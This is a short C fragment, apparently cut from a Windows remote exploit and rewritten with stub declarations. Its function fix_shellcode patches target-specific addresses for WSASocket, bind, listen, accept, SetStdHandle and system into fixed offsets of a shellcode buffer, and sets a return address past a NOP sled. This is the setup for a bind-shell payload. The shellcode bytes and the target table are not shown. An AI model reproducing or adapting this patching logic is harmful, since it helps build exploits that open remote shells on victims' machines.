
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int _system; int _stdhandle; int _accept; int _listen; int _bind; int _wsasock; } ;
struct TYPE_4__ {unsigned long sh_addr; TYPE_1__ _sh_fix; } ;


 scalar_t__ NOPS ;
 scalar_t__ _me ;
 int memcpy (scalar_t__,char*,int) ;
 scalar_t__ shellcode ;
 unsigned long strlen (scalar_t__) ;
 TYPE_2__* target ;

int fix_shellcode ( int choise )
{
 unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);


  memcpy(_me+3,((char *)&only_xp),4);



  memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);


  memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);


  memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);


  memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);


  memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);


  memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
